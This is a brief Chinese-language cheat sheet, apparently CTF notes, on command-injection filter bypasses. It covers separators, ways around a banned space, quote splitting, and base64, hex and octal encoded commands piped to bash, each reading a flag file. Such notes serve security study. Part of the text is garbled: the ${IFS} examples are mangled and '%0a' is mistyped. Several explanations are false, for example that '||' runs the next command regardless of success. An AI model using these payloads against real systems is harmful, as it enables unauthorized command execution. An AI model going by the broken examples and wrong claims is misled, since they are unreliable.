命令执行的小知识点总结

命令分隔符

1.%0阿，%0d

2.&把命令放后台去执行

例：ping 127.0.0.1&ls其实就是先执行ls

3.&&这个是只有前面命令执行成功才能执行后边的

一般绕过重定向时使用

4 .|管道符，左边的输出作为右边的输入

5.||这个是不论前面执行成功没有都指向后面的

ban +、>

$PS4就是>

$PS2就是+

空格被ban

linux

{cat,flag.txt}
cat\({IFS}flag.txt cat\)IFS\(9flag.txt cat<flag.txt cat<>flag.txt kg=\)'\x20flag.txt'&&cat$kg
(\x20转换成字符串就是空格，这里通过变量的方式巧妙绕过)

windows

（实用性不是很广，也就type这个命令可以用）
type.\flag.txt
type,flag.txt
echo,123456

命令拼接

php中''拼接字符串，也可以单引号绕过c'a't flag等价cat flag

\(a\)b拼接变量

echo Y2F0IGZsYWc=|base64 -d|bash;这是base64绕过

echo 0x63617420666c6167|xxd -rp|bash;这是16进制绕过

$(printf "\143\141\164\40\56\57\146\154\141\147");这是八进制绕过